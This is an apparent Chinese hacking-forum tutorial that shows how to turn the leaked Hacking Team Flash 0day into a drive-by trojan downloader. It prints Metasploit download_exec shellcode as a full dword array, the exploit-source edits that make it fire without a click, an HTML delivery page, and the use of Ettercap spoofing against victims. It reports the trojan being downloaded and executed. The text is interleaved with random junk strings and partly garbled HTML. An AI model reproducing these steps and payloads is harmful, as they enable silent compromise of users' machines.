三、flash 0day之手工代码修改制作下载者实例入侵演示
利用到的工具: , D- O$ Y7 A7 n
1 Y8 w- T: z* _. ^8 }: _3 E$ g5 `' q! I6 d& ~: m Msf , [% G) i( R& T* q- D
Ettercap 5 Z& D9 @2 V6 ~1 h+ i( @
3 ?( w/ o- U+ j4 b- }. g g& M, d+ _ Adobe Flash CS6 ! Q2 |5 E1 M$ S0 ]& o
, ]- ^$ N/ q" T" M0 b. J( v6 }1 z1 G* j, H Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 # {1 ^& L8 g8 n7 w4 G9 J
+ k& ^3 Z ^- S0 G% Z, P! K- r 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ' `( |9 m8 |; o7 r. p4 |, s. K) F) n
- V8 x8 W& @$ x 如图: ! S9 e( v" E" d- C& o) C4 X1 m
# r, y \9 x+ o
' a" s8 C& f1 a1 t% }, _) {, U
$ b: w3 h$ j5 l1 y3 J! N
+ h/ K4 _, H x$ c$ w) d 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 X( n+ g* I2 b. ~$ j
4 ^% z8 B7 b3 t. [& I7 }3 W; i/ l9 H! m# B
# F& x- ?5 I$ s" C% p
2 k- m5 T4 d$ P5 V* O 然后执行generate -t dword生成shellcode,如下: 8 K' z7 O& g; g. N! O3 q* p+ r. |) Z
+ @& |0 F7 A5 S
Q2 D# j! H, x" ^
# I* N. d. }* R I' o6 k( s+ c 复制代码到文本下便于我们一会编辑flash exp,如下: ' _) c4 U) Q4 e- g) `% U9 R" v
7 H0 X; ~# ^8 `( K( l2 H# z/ ~ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 `, b7 D, E; d' D0 J8 v6 `
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ }+ J- u1 [4 W# M- g4 Z7 ?
2 K( H3 r$ L3 I9 m5 _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 5 ]7 }- i" S% c; u$ T$ q0 I3 E
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
8 I8 W+ ]2 O6 Z5 ]' U0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
2 ~$ U$ N2 t j, @& @# c 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
) [/ J$ j& H- w. G1 J% N3 J 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " W; s( A- R& t( E! V) u
4 `( @3 {( ?% m( _0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
/ d, c p" N& L0 p2 i8 ?% ] 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # G/ p$ b) {% v: o) P% H8 D( `. \+ W
7 T5 y8 `7 r& ?4 L" V( g- m0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, B7 N4 b. ?# O; M4 E6 O
6 T0 G. Q& J. f( Q1 n( p" s# h; p$ a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
1 V7 y& Y! K( q2 A) |. @2 S: \* ^' Z5 x$ U! g; I' C- e6 f: k 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
8 M, [8 a: ~7 z! y8 a- _6 }/ V( l# k; r6 J) E % J8 w3 ?* x4 s V0 j
8 t! S) x2 M7 }3 @$ w8 U, B9 `: [7 H" ~; ?4 {
1 [; t' B/ X7 [ 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
8 ~0 p0 l, G3 Q! A6 B1 G
) k. t$ r: h0 y8 n5 w4 M/ B
先修改ShellWin32.as,部分源代码如图: ) }5 ?- Z; D/ k" Q
: @, Z0 ^6 p: F7 [' F _% h
, t5 L- U1 N% o, B" P) r+ G5 J
' e3 d+ D P: O" n9 L4 \% _0 z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; Y& B$ [4 m, S( {* N2 e
+ P& B$ Y( F% I. H: V! \4 }( \, H* C0 o2 n1 n& e
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
! E$ P P3 L! Z5 Y. N7 u' B 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
# p1 [, x! ~" J: F' n! O" X; H- y1 g
( F- j# c( c! ~' @6 O& F 2 X' X/ i6 W' t
% w7 t8 t1 u, g5 N l 然后点保存,下面我们来编译一下,打开 ' v/ S9 f2 Y5 U# Q1 Q% n* \
exp1.fla然后点文件-发布,看看编译没错误 * | R p5 X5 G7 `5 u, C; N
- [3 ]8 @) x) Q# y
" C1 h' k( |! }( r
+ S6 z+ A8 g7 G) g/ v% \7 q 然后我们把生成的 ( [3 g. J% ^. X
exp1.swf丢到kailinux 的/var/www/html下: 7 G R5 V' r1 {5 w
: p/ H& K0 c" F" I 然后把这段代码好好编辑一下 ) X7 J0 J9 D5 [
" K* D; G u* ?' w0 A
; ]& s- m7 {# C7 Z9 I
$ }' S* }1 V1 ` g/ N+ ]% y5 ]& T+ W; _2 l9 k4 O `
3 `9 N( F* _7 y4 ~7 o( Y2 d7 U
4 U6 Q0 J0 ~6 q3 E' D <!DOCTYPE html> 3 C) I: }( p, E
# S- T/ C& n0 q <html>
. @! ]- o2 P" J. e <head>
: C! K ]3 \8 j# v. A( s<meta http-equiv="Content-Type" content="text/html;
charset=utf-8"/> 1 _: b( W- ]* s$ a$ i* S
" x' `6 v; r% M" k7 {1 y+ M/ X$ H/ [& u$ k; c3 W </head>
6 r; W! u8 z/ O7 x$ _4 ] <body>
<h2> Please wait, the requested page is loading...</h2>
<br>
/ a! `# o8 X. R% k2 e, [/ O2 u2 i. M# E <OBJECT ) I- t3 a8 n" F; I; C. E
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
</body> ) p; j+ \7 @; H
6 H$ G4 z# z- |7 n9 H" I8 |- T <script> 7 e" u- F/ U6 T# v
0 n5 a& U! t* M+ r4 u+ V- \4 s. hsetTimeout(function () {
' y& C* r. ]: s. E0 B' }0 P$ s: r4 r, Q5 }4 m 9 s8 `) O+ u% x; w0 y9 z; J
1 G& L5 ?& _9 }& P% ?+ F3 y, a9 Iwindow.location.reload();
# m3 X" Y$ d, ~! c& s2 Q% _- c5 g2 a8 F- Z" h8 p( \ Z2 P }, 10000);
. q3 c5 u# ]2 X- t. E. ~3 f& ^, s# N) j: { . z0 i. K' L1 ?
( F4 D( A+ o8 h) Z1 R2 q- e* w& w+ I( n4 s& a </script> + [- D3 g$ J( s- e1 j1 C6 v
) W/ Z0 }5 ^% _ </html>
) `0 R* E+ C0 F4 J
& I% f- U: Z. n) R( a! _ 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
& d, D) J1 O! o X
) I+ \! A. N( s0 O' P
2 Y% ], I6 d( c4 J* r ; o& V% Z3 U% V
+ X! x- y# q: e1 b# w, g: g) B$ _
9 z# h) ]8 i ?/ P1 M) U, {. ]# D6 J0 _. T1 o! P: u P
下面我们用ettercap欺骗如图: . h" _) h6 o/ b6 m/ N
+ [. g% d( z% V) w1 Y& H& o. h/ O" |; M5 g+ F+ H \, x# P
$ j8 y" `4 }0 B
- b& X& S8 `+ i2 b* ~+ t2 A7 I
下面我们随便访问个网站看看:
+ U8 U$ L4 T( d9 h3 d0 k我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
& @: Q5 {1 {) @3 x
' v& O0 i! b: q6 u# u
% h$ r0 m* P, `) V 我们看另一台, - W9 U) V# Q, \
, `4 I3 x3 ~5 i% P- N: a" f/ B! v
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |